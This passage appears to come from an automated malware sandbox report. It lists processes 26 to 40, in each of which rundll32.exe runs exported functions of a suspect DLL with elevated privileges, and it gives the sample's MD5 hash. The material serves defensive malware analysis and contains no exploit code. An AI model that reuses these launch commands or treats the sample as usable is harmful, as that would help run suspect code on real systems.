Has exited:	true

Target ID:	26
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_date
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_bool
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array_buffer
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	29
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8value_create_array
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	30
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8stack_trace_get_current
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	31
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_in_context
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	32
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_entered_context
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	33
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_v8context_get_current_context
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_urlrequest_create
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	35
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uriencode
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	36
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_uridecode
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	37
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_unregister_internal_web_plugin
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	38
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_to_timet
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	39
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_now
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	40
Start time:	00:22:07
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\0Gs0WEGB1E.dll",cef_time_delta
Imagebase:	0xc80000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true